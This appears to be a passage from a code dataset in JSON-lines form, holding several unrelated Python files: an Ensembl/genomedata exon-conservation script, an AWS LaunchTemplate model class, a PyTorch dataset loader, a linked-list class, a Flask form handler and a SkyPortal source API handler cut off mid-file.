pairs.\n\t\"\"\"\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\t\t#\n\t\toutdirTemp=outdir+\"/\"+g1+\"-\"+g2; os.system(\"mkdir -p \"+outdirTemp)\n\t\toutfile1=open(outdirTemp+\"/\"+orgId1+\"_exons.bed\",'w')\n\t\toutfile2=open(outdirTemp+\"/\"+orgId2+\"_exons.bed\",'w')\n\t\t\n\t\texons1=geneDic1[g1].exons\n\t\texons2=geneDic2[g2].exons\n\t\tfor e1 in exons1:\n\t\t\toutfile1.write(exonDic1[e1].get_summary_string()+\"\\n\")\n\t\tfor e2 in exons2:\n\t\t\toutfile2.write(exonDic2[e2].get_summary_string()+\"\\n\")\n\t\t#\n\t#\tprint exonDic[e].get_summary_string()\n\n\t\toutfile1.close()\n\t\toutfile2.close()\n\t\t\n\t#\n\treturn\n\ndef extract_fasta_files_for_exons(refGD,exonDic,typ,fivePrimeFlank,threePrimeFlank,outfilename):\n\t\"\"\"\n\tWith the help of genomedata archive extract the nucleotide sequences \n\tfrom and around each exon and write them in a .fa file.\n\trefGD is the genomedata archive created for the reference genome.\n\ttyp can be one of the following:\n\t\t\"allExon\": Extract the sequence of the whole exon.\n\t\t\"allExonPlusMinus\": Like allExon but with flanking 5' and 3'.\n\t\t\"intronExon\": Extract the sequence from the juction of this\n\t\t exon and the previous intron.\n\t\t\"exonIntron\": Extract the sequence from the juction of this\n\t\t exon and the next intron.\n\tfivePrimeFlank is the amount to extract extra from the 5' end.\n\tthreePrimeFlank is the amount to extract extra from the 3' end.\n\n\t\"\"\"\n\tif typ==\"allExon\":\n\t\tfivePrimeFlank=0; threePrimeFlank=0\n\t#\n\toutfile=open(outfilename,'w')\n\twith Genome(refGD) as genome:\n\t\tfor id in exonDic:\n\t\t\te=exonDic[id]\n\t\t\tch,st,en=\"chr\"+e.basicInfoDic[\"chromosome\"], e.basicInfoDic[\"start_coord\"], e.basicInfoDic[\"end_coord\"]\n\t\t\tstrand,id=e.basicInfoDic[\"strand\"], e.basicInfoDic[\"exon_id\"]\n\t\t\t# off by one error fix by -1\n\t\t\tst=int(st)-1\n\t\t\ten=int(en)-1\n\t\t\tif strand==\"+\":\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\ten=st # make sure we're around the first bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank # make sure 5' part is of size fivePrimeFlank including st\n\t\t\t\t\ten=en+threePrimeFlank # make sure 3' part is of size threePrimeFlank including en\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\tst=en # make sure we're around the last bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank+1\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\telif typ==\"allExonPlusMinus\" or typ==\"allExon\":\n\t\t\t\t\tst=st-fivePrimeFlank\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\t#\n\t\t\t\tid=id+\"_plusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring().lower().upper()\n\t\t\telse:\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\tst=en # make sure we're around the first bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t\tst=st-threePrimeFlank+1\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\ten=st # make sure we're around the last bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\telif typ==\"allExonPlusMinus\" or typ==\"allExon\":\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t#\n\t\t\t\tid=id+\"_minusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring()\n\t\t\t\t#sq=sq.lower()[::-1].upper() # reverse\n\t\t\t\t#sq=sq.lower().translate(complement).upper() # complement\n\t\t\t\tsq=sq.lower().translate(complement)[::-1].upper() # reverse complement\n\t\t\t#\n\t\t\toutfile.write(\">\"+id+\"_\"+typ+\"\\n\")\n\t\t\toutfile.write(sq+\"\\n\")\n\t\t#\n\t#\n\toutfile.close()\n\treturn\n\ndef extract_conservation_stats_for_exons(refGD,exonDic,typ,fivePrimeFlank,threePrimeFlank,outfilename):\n\t\"\"\"\n\tWith the help of genomedata archive extract the nucleotide sequences \n\tfrom and around each exon and convservation scores and write them to a file.\n\trefGD is the genomedata archive created for the reference genome.\n\ttyp can be one of the following:\n\t\t\"allExon\": Extract the sequence of the whole exon.\n\t\t\"allExonPlusMinus\": Like allExon but with flanking 5' and 3'.\n\t\t\"intronExon\": Extract the sequence from the juction of this\n\t\t exon and the previous intron.\n\t\t\"exonIntron\": Extract the sequence from the juction of this\n\t\t exon and the next intron.\n\tfivePrimeFlank is the amount to extract extra from the 5' end.\n\tthreePrimeFlank is the amount to extract extra from the 3' end.\n\tIF outfilename is \"None\" then no output file is written, only \n\trelevant fields are added to the exon in exonDic.\n\t\"\"\"\n\tsys.stderr.write(\"Extracting conservation stats and acceptor donor sites for exons from genomedata archive\\n\")\n\t# this is the trackname for phastCons scores loaded from wig files\n\ttrackName=\"phastCons\"\n\t#\n\n\tif typ==\"allExon\":\n\t\tfivePrimeFlank=0; threePrimeFlank=0\n\t#\n\tif outfilename!=\"None\":\n\t\toutfile=open(outfilename,'w')\n\t\t# header line\n\t\toutfile.write(\"CHR\\tstart\\tend\\tstrand\\tExonID\\tacceptor2bp\\tdonor2bp\\tpreAcceptorCons\\taccepterCons1\\taccepterCons2\\texon5primeCons\\texonMidCons\\texon3primeCons\\tdonorCons1\\tdonorCons2\\tpostDonorCons\\n\")\n\t#\n\twith Genome(refGD) as genome:\n\t\tlineCount=0\n\t\tfor id in exonDic:\n\t\t\tprint (id)\n\t\t\te=exonDic[id]\n\t\t\tch,st,en=\"chr\"+e.basicInfoDic[\"chromosome\"], e.basicInfoDic[\"start_coord\"], e.basicInfoDic[\"end_coord\"]\n\t\t\tif e.exon_type==\"partCoding\":\n\t\t\t\tcodingSt=min(int(e.codingExon[0])-1,int(e.codingExon[1])-1)\n\t\t\t\tcodingEn=max(int(e.codingExon[0])-1,int(e.codingExon[1])-1)\n\t\t\t#\n\t\t\tstOrig=st; enOrig=en;\n\t\t\tstrand,id=e.basicInfoDic[\"strand\"], e.basicInfoDic[\"exon_id\"]\n\t\t\t# off by one error fix by -1\n\t\t\tst=int(st)-1\n\t\t\ten=int(en)-1\n\t\t\tif strand==\"+\":\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\ten=st # make sure we're around the first bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank # make sure 5' part is of size fivePrimeFlank including st\n\t\t\t\t\ten=en+threePrimeFlank # make sure 3' part is of size threePrimeFlank including en\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\tst=en # make sure we're around the last bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank+1\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\telif typ==\"allExonPlusMinus\":\n\t\t\t\t\tst=st-fivePrimeFlank\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\t#\n\t\t\t\t#id=id+\"_plusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring().lower().upper()\n\t\t\t\tallScores=(genome[ch])[st:en,trackName]\n\t\t\telse:\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\tst=en # make sure we're around the first bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t\tst=st-threePrimeFlank+1\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\ten=st # make sure we're around the last bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\telif typ==\"allExonPlusMinus\":\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t#\n\t\t\t\t#id=id+\"_minusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring()\n\t\t\t\tsq=sq.lower().translate(complement)[::-1].upper() # reverse complement\n\t\t\t\tallScores=(genome[ch])[st:en,trackName][::-1]\n\t\t\t#\n\t\t\tprint (sq)\n\t\t\tprint (allScores)\n\t\t\tprint (genome[ch].seq[st:en].tostring())\n\t\t\tif e.exon_type==\"partCoding\":\n\t\t\t\tcodingScores=(genome[ch])[codingSt:codingEn,trackName][::-1]\n\t\t\t### Extract all the scores to be written to the output file ###\n\t\t\tacceptor2bp=sq[fivePrimeFlank-2:fivePrimeFlank]\n\t\t\tdonor2bp=(sq[-threePrimeFlank:])[0:2]\n\t\t\t#\n\t\t\tx=allScores[:fivePrimeFlank-2]\n\t\t\tpreAcceptorCons=np.nanmean(x)\n\t\t\t#\n\t\t\taccepterCons1=allScores[fivePrimeFlank-2]\n\t\t\taccepterCons2=allScores[fivePrimeFlank-1]\n\t\t\t#\n\t\t\tx=allScores[fivePrimeFlank:fivePrimeFlank+(fivePrimeFlank-2)]\n\t\t\texon5primeCons=np.nanmean(x)\n\t\t\t#\n\t\t\tx=allScores[fivePrimeFlank+(fivePrimeFlank-2):-(threePrimeFlank+(threePrimeFlank-2))]\n\t\t\texonMidCons=np.nanmean(x)\n\t\t\t#\n\t\t\tx=allScores[-(threePrimeFlank+(threePrimeFlank+2)):-threePrimeFlank]\n\t\t\texon3primeCons=np.nanmean(x)\n\t\t\t#\n\t\t\tdonorCons1=allScores[-threePrimeFlank]\n\t\t\tdonorCons2=allScores[-threePrimeFlank+1]\n\t\t\t#\n\t\t\tx=allScores[-threePrimeFlank+2:]\n\t\t\tpostDonorCons=np.nanmean(x)\n\t\t\t#\n\t\t\t#first20bp=allScores[:20]\n\t\t\t#outfile.write(\"%s\\t%d\\t%d\\t%s\\t%s\\t%s\\t%s\\t\" % (ch,stOrig,enOrig,strand,id,acceptor2bp,donor2bp))\n\t\t\t#outfile.write(\"\\t\".join([repr(x) for x in first20bp])+\"\\n\")\n\t\t\texonDic[id].acceptor2bp=acceptor2bp\n\t\t\texonDic[id].donor2bp=donor2bp\n\t\t\texonDic[id].phastConsScores=allScores\n\t\t\texonDic[id].avgConsScore=np.nanmean(allScores[fivePrimeFlank:-threePrimeFlank])\n\t\t\tif e.exon_type==\"partCoding\":\n\t\t\t\texonDic[id].avgCodingConsScore=np.nanmean(codingScores)\n\n\t\t\tif lineCount%100000==0:\n\t\t\t\tsys.stderr.write(str(lineCount)+\"\\t\")\n\t\t\tlineCount+=1\n\t\t\tprint (sq)\n\t\t\tprint (\"%s\\t%d\\t%d\\t%s\\t%s\\t%s\\t%s\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\n\" % \\\n (ch,stOrig,enOrig,strand,id,acceptor2bp,donor2bp, preAcceptorCons, accepterCons1, accepterCons2, exon5primeCons,\\\n exonMidCons, exon3primeCons, donorCons1, donorCons2, postDonorCons, exonDic[id].avgCodingConsScore, exonDic[id].avgConsScore))\n\n\t\t\tif outfilename!=\"None\":\n\t\t\t\toutfile.write(\"%s\\t%d\\t%d\\t%s\\t%s\\t%s\\t%s\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\n\" % \\\n\t\t\t\t\t(ch,stOrig,enOrig,strand,id,acceptor2bp,donor2bp, preAcceptorCons, accepterCons1, accepterCons2, exon5primeCons,\\\n\t\t\t\t\t exonMidCons, exon3primeCons, donorCons1, donorCons2, postDonorCons, exonDic[id].avgCodingConsScore, exonDic[id].avgConsScore))\n\t\t\t#\n\t\t\t###\n\t\t#\n\t#\n\tsys.stderr.write(\"\\n\\n\")\n\tif outfilename!=\"None\":\n\t\toutfile.close()\n\treturn exonDic\n\ndef assign_firstMidLast_exon_counts(exonDic,transcriptDic):\n\tfor e in exonDic:\n\t\tfor i in range(len(exonDic[e].exonNumbers)):\n\t\t\ttranscriptLength=len(transcriptDic[exonDic[e].transcriptIds[i]].exons)\n\t\t\ttempExNo=exonDic[e].exonNumbers[i]\n\t\t\t#print [transcriptLength, tempExNo]\n\t\t\t#single exon\n\t\t\tif tempExNo==1 and tempExNo==transcriptLength:\n\t\t\t\texonDic[e].firstMidLast[0]+=1\n\t\t\t\texonDic[e].firstMidLast[2]+=1\n\t\t\t#first exon\n\t\t\telif tempExNo==1:\n\t\t\t\texonDic[e].firstMidLast[0]+=1\n\t\t\t#last exon\n\t\t\telif tempExNo==transcriptLength:\n\t\t\t\texonDic[e].firstMidLast[2]+=1\n\t\t\telse:\n\t\t\t\texonDic[e].firstMidLast[1]+=1\n\t\t#\n\t\t#if exonDic[e].firstMidLast[0]>0 or exonDic[e].firstMidLast[2]>0:\n\t\t#print exonDic[e].get_summary_string()\n\t#\n\treturn exonDic\n\n# Testing functionalities\ndef main(argv):\n\torgId1=\"human\"; orgId2=\"mouse\";\n\trefGD1=\"/home/fao150/proj/2015orthoR01/results/2015-03-17_creating-genomedata-archives-for-refs/hg38\"\n\trefGD2=\"/home/fao150/proj/2015orthoR01/results/2015-03-17_creating-genomedata-archives-for-refs/mm10\"\n\n#\toutdir=\"GTFsummaries\"; \n\tif len(argv)==1:\n\t\treturn\n\n\toutdir=argv[1]\n\tos.system(\"mkdir -p \"+outdir)\n\tos.system(\"mkdir -p \"+outdir+\"/GTFsummaries\")\t\t\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Homo_sapiens.GRCh38.78.gtf.gz\"\n\tinfilename=\"Homo_sapiens.GRCh38.102.gtf\"\n\t#geneDic1,transcriptDic1,exonDic1,infoDic1=parse_organism_GTF(orgId1, infilename, outdir+\"/GTFsummaries\")\n\t\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Mus_musculus.GRCm38.78.gtf.gz\"\n\tinfilename=\"Mus_musculus.GRCm38.102.gtf\"\n\t#geneDic2,transcriptDic2,exonDic2,infoDic2=parse_organism_GTF(orgId2, infilename, outdir+\"/GTFsummaries\")\n\n\t## these two files were downloaded by hand selecting columns from Ensembl's Biomart\n\t## I weren't able to redo the same column selections recently so I decided to switch to\n\t## parsing the orthology information from readily available Ensembl files like below ones:\n\t## ftp://ftp.ensembl.org/pub/release-80/mysql/ensembl_mart_80/\n\t## hsapiens_gene_ensembl__homolog_mmus__dm.txt.gz\n\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Ensembl-human-GRCh38-to-mouse-GRCm38.p3.txt.gz\"\n\t#genePairsHumanToMouse=parse_ensembl_gene_pairings(orgId1,orgId2,infilename)\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Ensembl-mouse-GRCm38.p3-to-human-GRCh38.txt.gz\"\n\t#genePairsHumanToMouse=parse_ensembl_gene_pairings(orgId1,orgId2,infilename)\n\t\n\t#### Rewritten:\tAbhijit ####\n\tinfilename=\"Ensembl-human-GRCh38-to-mouse-GRCm38.Formatted.txt\"\n\t#genePairsHumanToMouse=parse_ensembl_gene_pairings(infilename)\n\n\tinfilename=\"Ensembl-mouse-GRCm38-to-human-GRCh38.Formatted.txt\" \n\t#genePairsMouseToHuman=parse_ensembl_gene_pairings(infilename)\n\t#consistency_check(genePairsHumanToMouse,genePairsMouseToHuman)\n\n\t## if consistency check is ok then just use one side. This is OK for one2one mappings.\n\t#genePairsDic=genePairsHumanToMouse\n\t#os.system(\"mkdir -p \"+outdir+\"/perGenePairPickledInfo\")\n\t#pickle_one2one_genePairs_allInfo(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,transcriptDic1,transcriptDic2,outdir+\"/perGenePairPickledInfo\") \n\t\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/hsapiens_gene_ensembl__homolog_mmus__dm.txt.gz\"\n\t#infilename=\"hsapiens_gene_ensembl__homolog_mmusculus__dm.txt\"\n\t#proteinToGeneDic,genePairsDic,proteinPairsDic=parse_ensembl_geneAndProtein_pairings(infilename,{},{})\n\t#print ([\"1\",len(proteinToGeneDic),len(genePairsDic),len(proteinPairsDic)])\n\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/mmusculus_gene_ensembl__homolog_hsap__dm.txt.gz\"\n\t#infilename=\"mmusculus_gene_ensembl__homolog_hsapiens__dm.txt\"\n\t#proteinToGeneDic,genePairsDic,proteinPairsDic=parse_ensembl_geneAndProtein_pairings(infilename,proteinToGeneDic,proteinPairsDic)\n\t#print ([\"2\",len(proteinToGeneDic),len(genePairsDic),len(proteinPairsDic)])\n\n\t\n\t#exonDic1=assign_firstMidLast_exon_counts(exonDic1,transcriptDic1)\n\t#exonDic2=assign_firstMidLast_exon_counts(exonDic2,transcriptDic2)\n\n\ttyp=\"allExonPlusMinus\"\n\toutfilename=\"None\"\n\tfivePrimeFlank=12; threePrimeFlank=12\n\t#exonDic1=extract_conservation_stats_for_exons(refGD1,exonDic1,typ,fivePrimeFlank,threePrimeFlank,outfilename)\n\t#exonDic2=extract_conservation_stats_for_exons(refGD2,exonDic2,typ,fivePrimeFlank,threePrimeFlank,outfilename)\n\n\t#outdir=argv[1]+\"/after\"\n\t#os.system(\"mkdir -p \"+outdir)\n\t#print_some_summary(orgId1, geneDic1,transcriptDic1,exonDic1,{}, outdir)\n\t#print_some_summary(orgId2, geneDic2,transcriptDic2,exonDic2,{}, outdir)\n\n#\toutdir=\"perGenePairExonLists\"\n\tif len(argv)==2:\n\t\treturn\n\n\t#outdir=argv[2]\n\t#os.system(\"mkdir -p \"+outdir)\n\n\t#pickle_one2one_genePairs_allInfo(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,transcriptDic1,transcriptDic2,outdir) \n\n#\toutfilename=outdir+\"/genePairsSummary-one2one.txt\"\n#\tprint_one2one_genePairs(genePairsDic,geneDic1,geneDic2,outfilename) # either way is ok since one2one\n\t#\n#\tprint_one2one_exonListPairs(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,orgId1,orgId2,outdir)\n#\tprint_one2one_transcriptListPairs(genePairsDic,geneDic1,geneDic2,transcriptDic1,transcriptDic2,orgId1,orgId2,outdir)\n\n\treturn\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n\n\n","sub_path":"Human-Monkey-Processed-Data/scripts/ensemblUtils.py","file_name":"ensemblUtils.py","file_ext":"py","file_size_in_byte":49280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452692608","text":"from typing import List, Optional\n\nfrom cloudrail.knowledge.context.aws.resources.networking_config.network_configuration import NetworkConfiguration\nfrom cloudrail.knowledge.context.aws.resources.ec2.security_group import SecurityGroup\nfrom cloudrail.knowledge.context.aws.resources.service_name import AwsServiceName\nfrom cloudrail.knowledge.context.aws.resources.aws_resource import AwsResource\n\n\nclass LaunchTemplate(AwsResource):\n \"\"\"\n Attributes:\n template_id: The ID of the template.\n name: The name of the template.\n http_token: \"optional\" or \"required\" (if None, means \"optional\").\n image_id: The EC2 Image ID of the instance.\n security_group_ids: The security groups used with the instance.\n version_number: The version number of this template.\n iam_instance_profile: The IAM Instance Profile to associate with launched instances (may be None).\n network_configurations: The network configuration(s) set in the template (may be None).\n security_groups: Points to the actual security groups set in security_group_ids.\n instance_type: The Instance type (i.e. 'm5.8xlarge').\n ebs_optimized: Indication whether the EC2 instance has EBS optimization enabled of not.\n monitoring_enabled: Indication if the launched EC2 instance will have detailed monitoring enabled.\n \"\"\"\n def __init__(self,\n template_id: str,\n name: str,\n http_token: str,\n image_id: str,\n security_group_ids: List[str],\n version_number: int,\n region: str,\n account: str,\n iam_instance_profile: Optional[str],\n ebs_optimized: bool,\n monitoring_enabled: bool,\n instance_type: str,\n network_configurations: List[NetworkConfiguration] = None):\n super().__init__(account, region, AwsServiceName.AWS_LAUNCH_TEMPLATE)\n self.template_id: str = template_id\n self.name: str = name\n self.http_token: str = http_token\n self.image_id: str = image_id\n self.security_group_ids: List[str] = security_group_ids\n self.version_number: int = version_number\n self.iam_instance_profile: Optional[str] = iam_instance_profile\n self.network_configurations: List[NetworkConfiguration] = network_configurations or []\n self.security_groups: List[SecurityGroup] = []\n self.ebs_optimized: bool = ebs_optimized\n self.monitoring_enabled: bool = monitoring_enabled\n self.instance_type: str = instance_type\n\n def get_keys(self) -> List[str]:\n return [self.template_id, self.version_number]\n\n def get_name(self) -> str:\n return self.name\n\n def get_id(self) -> str:\n return self.template_id\n\n def get_type(self, is_plural: bool = False) -> str:\n if not is_plural:\n return 'Launch template'\n else:\n return 'Launch templates'\n\n def get_cloud_resource_url(self) -> str:\n return '{0}ec2/v2/home?region={1}#LaunchTemplateDetails:launchTemplateId={2}'\\\n .format(self.AWS_CONSOLE_URL, self.region, self.template_id)\n\n def get_arn(self) -> str:\n pass\n\n @property\n def is_tagable(self) -> bool:\n return False\n","sub_path":"cloudrail/knowledge/context/aws/resources/autoscaling/launch_template.py","file_name":"launch_template.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536641852","text":"import os\nimport torch\nfrom torch.utils.data.dataset import Dataset\nfrom pprint import pprint\n\nclass DataFromFile(Dataset):\n def __init__(self, data_path, transforms=None):\n self.data_path = data_path\n\n assert data_path is not None and os.path.exists(data_path), 'No file to read data from'\n\n if data_path:\n # will be read in from txt file\n with open(data_path, 'r') as datafile:\n self.data = datafile.readlines() \n\n self.transforms = transforms\n\n def __getitem__(self, index):\n item = self.data[index]\n # pprint('item:{}'.format(str(item)))\n # item would be a comma-delimited string of length\n # split, map to ints\n item = item.strip().split('_') # now it is a list of ints\n # pprint('item:{}'.format(str(item)))\n # print(len(item))\n\n # no modifiers\n query = item[:4]\n # pprint(query)\n query = [list(map(int, q.lstrip('[').rstrip(']').split(','))) for q in query]\n # print(len(query), len(query[0]))\n\n pos = item[4:8]\n pos = [list(map(int, p.lstrip('[').rstrip(']').split(','))) for p in pos]\n # print(len(pos), len(pos[0]))\n neg = item[8:]\n neg = [list(map(int, n.lstrip('[').rstrip(']').split(','))) for n in neg]\n # print(len(neg), len(neg[0]))\n # pprint(neg)\n\n if self.transforms:\n query, pos, neg = self.transforms(query), self.transforms(pos), self.transforms(neg)\n\n return query, pos, neg\n\n def __len__(self):\n return len(self.data)\n\n","sub_path":"scripts/dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5884888","text":"# We can't delete the first node or make it point to another node\n# because in Python, this will cause the list to point to an entirely different\n# object( reassigning vs manipulating)\nclass Node:\n def __init__(self, v=None):\n self.value = v\n self.next = None\n\n def isempty(self):\n return (self.value == None)\n\n def append_recursively(self, v):\n # If the node is empty simply put a value in it\n if self.isempty(): \n self.value = v\n # If we are at the last node make its next pointer to the current value\n elif self.next == None: \n newnode = Node(v)\n self.next = newnode\n # If there are nodes in front, recursively append the required value\n # into the next node\n else:\n (self.next).append_recursively(v)\n return\n\n def append(self, v):\n if self.isempty():\n self.value = v\n return\n\n temp = self\n while (temp.next != None):\n temp = temp.next\n newnode = Node(v)\n temp.next = newnode\n return\n\n # Insert at the beginning\n def insert(self, v):\n if self.isempty():\n self.value = v\n return\n\n newnode = Node(v)\n\n # Evchange values in self and newnode\n (self.value, newnode.value) = (newnode.value, self.value)\n (self.next, newnode.next) = (newnode, self.next)\n\n def delete(self, x):\n # Empty list: Simply return \n if self.isempty():\n return\n\n # If the node we wan't to delete is the first node in the list\n # don't directly delete it:\n if self.value == x:\n # If the list consists of only a single node\n if self.next == None:\n self.value = None\n # If this node is first and the required node but not the only node in list\n # Copy the second node in first and then bypass second\n else:\n self.value = self.next.value\n self.next = self.next.next\n return\n\n # Otherwise walk down the list and delete the required node\n temp = self\n while temp.next != None:\n if temp.next.value == x:\n temp.next = temp.next.next\n return\n else:\n temp = temp.next\n return\n\n\n def delete_recursively(self,v): # delete_recursively\n if self.isempty():\n return\n\n if self.value == v:\n self.value = None\n if self.next != None:\n self.value = self.next.value\n self.next = self.next.next\n return\n else:\n if self.next != None:\n self.next.delete_recursively(v)\n if self.next.value == None:\n self.next = None\n return\n \n def __str__(self):\n selflist = []\n if self.value == None:\n return(str(selflist))\n\n temp = self\n selflist.append(temp.value)\n \n while temp.next != None:\n temp = temp.next\n selflist.append(temp.value)\n\n return(str(selflist))\n","sub_path":"python3_code/my_list_implementation.py","file_name":"my_list_implementation.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333392033","text":"from flask import Flask, render_template, request, jsonify\nfrom app import app\nimport os\nfrom datetime import datetime\nimport sqlite3\n\nform_data = \"./form_data.db\"\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/save_form', methods=['POST'])\ndef save_form(): \n try:\n Name = request.form.get('name')\n Email = request.form.get('email')\n Title = request.form.get('title')\n Message = request.form.get('message')\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n conn = sqlite3.connect(form_data)\n cur = conn.cursor()\n cur.execute(\"INSERT INTO form_data (Name, Email, Title, Message, Date) VALUES(?, ?, ?, ?, ?)\" ,(Name, Email, Title, Message, timestamp))\n conn.commit()\n return jsonify({\"success\": True})\n except:\n conn.rollback()\n return jsonify({\"success\": False})\n conn.close()","sub_path":"1_Projects/7_FlaskNew/Ajax/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"227479568","text":"import tornado.web\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import func\nimport arrow\nfrom functools import reduce\nfrom marshmallow.exceptions import ValidationError\nfrom baselayer.app.access import permissions, auth_or_token\nfrom .base import BaseHandler\nfrom ..models import (DBSession, Comment, Instrument, Photometry, Source,\n Thumbnail, GroupSource, Token, User, Group)\n\n\nSOURCES_PER_PAGE = 100\n\n\nclass SourceHandler(BaseHandler):\n @auth_or_token\n def get(self, source_id=None):\n \"\"\"\n ---\n single:\n description: Retrieve a source\n parameters:\n - in: path\n name: source_id\n required: false\n schema:\n type: integer\n responses:\n 200:\n content:\n application/json:\n schema: SingleSource\n 400:\n content:\n application/json:\n schema: Error\n multiple:\n description: Retrieve all sources\n responses:\n 200:\n content:\n application/json:\n schema: ArrayOfSources\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n info = {}\n page_number = self.get_query_argument('page', None)\n if source_id:\n info['sources'] = Source.get_if_owned_by(\n source_id, self.current_user,\n options=[joinedload(Source.comments),\n joinedload(Source.thumbnails)\n .joinedload(Thumbnail.photometry)\n .joinedload(Photometry.instrument)\n .joinedload(Instrument.telescope)])\n elif page_number:\n page = int(page_number)\n q = Source.query.filter(Source.id.in_(DBSession.query(\n GroupSource.source_id).filter(GroupSource.group_id.in_(\n [g.id for g in self.current_user.groups]))))\n info['totalMatches'] = q.count()\n info['sources'] = q.limit(SOURCES_PER_PAGE).offset(\n (page - 1) * SOURCES_PER_PAGE).all()\n info['pageNumber'] = page\n info['sourceNumberingStart'] = (page - 1) * SOURCES_PER_PAGE + 1\n info['sourceNumberingEnd'] = min(info['totalMatches'],\n page * SOURCES_PER_PAGE)\n info['lastPage'] = info['totalMatches'] <= page * SOURCES_PER_PAGE\n if info['totalMatches'] == 0:\n info['sourceNumberingStart'] = 0\n else:\n if isinstance(self.current_user, Token):\n token = self.current_user\n info['sources'] = list(reduce(\n set.union, (set(group.sources) for group in token.groups)))\n else:\n info['sources'] = self.current_user.sources\n\n if info['sources'] is not None:\n return self.success(data=info)\n else:\n return self.error(f\"Could not load source {source_id}\",\n data={\"source_id\": source_id_or_page_num})\n\n @permissions(['Upload data'])\n def post(self):\n \"\"\"\n ---\n description: Upload a source. If group_ids is not specified, the user or token's groups will be used.\n parameters:\n - in: path\n name: source\n schema: Source\n responses:\n 200:\n content:\n application/json:\n schema:\n allOf:\n - Success\n - type: object\n properties:\n id:\n type: string\n description: New source ID\n \"\"\"\n data = self.get_json()\n schema = Source.__schema__()\n user_group_ids = [g.id for g in self.current_user.groups]\n if not user_group_ids:\n return self.error(\"You must belong to one or more groups before \"\n \"you can add sources.\")\n try:\n group_ids = [id for id in data.pop('group_ids') if id in user_group_ids]\n except KeyError:\n group_ids = user_group_ids\n if not group_ids:\n return self.error(\"Invalid group_ids field. Please specify at least \"\n \"one valid group ID that you belong to.\")\n try:\n s = schema.load(data)\n except ValidationError as e:\n return self.error('Invalid/missing parameters: '\n f'{e.normalized_messages()}')\n groups = Group.query.filter(Group.id.in_(group_ids)).all()\n if not groups:\n return self.error(\"Invalid group_ids field. Please specify at least \"\n \"one valid group ID that you belong to.\")\n s.groups = groups\n DBSession.add(s)\n DBSession().commit()\n\n self.push_all(action='skyportal/FETCH_SOURCES')\n return self.success(data={\"id\": s.id})\n\n @permissions(['Manage sources'])\n def put(self, source_id):\n \"\"\"\n ---\n description: Update a source\n parameters:\n - in: path\n name: source\n schema: Source\n responses:\n 200:\n content:\n application/json:\n schema: Success\n 400:\n content:\n application/json:\n schema: Error\n \"\"\"\n s = Source.get_if_owned_by(source_id, self.current_user)\n data = self.get_json()\n data['id'] = source_id\n\n schema = Source.__schema__()\n try:\n schema.load(data)\n except ValidationError as e:\n return self.error('Invalid/missing parameters: '\n f'{e.normalized_messages()}')\n DBSession().commit()\n\n return self.success(action='skyportal/FETCH_SOURCES')\n\n @permissions(['Manage sources'])\n def delete(self, source_id):\n 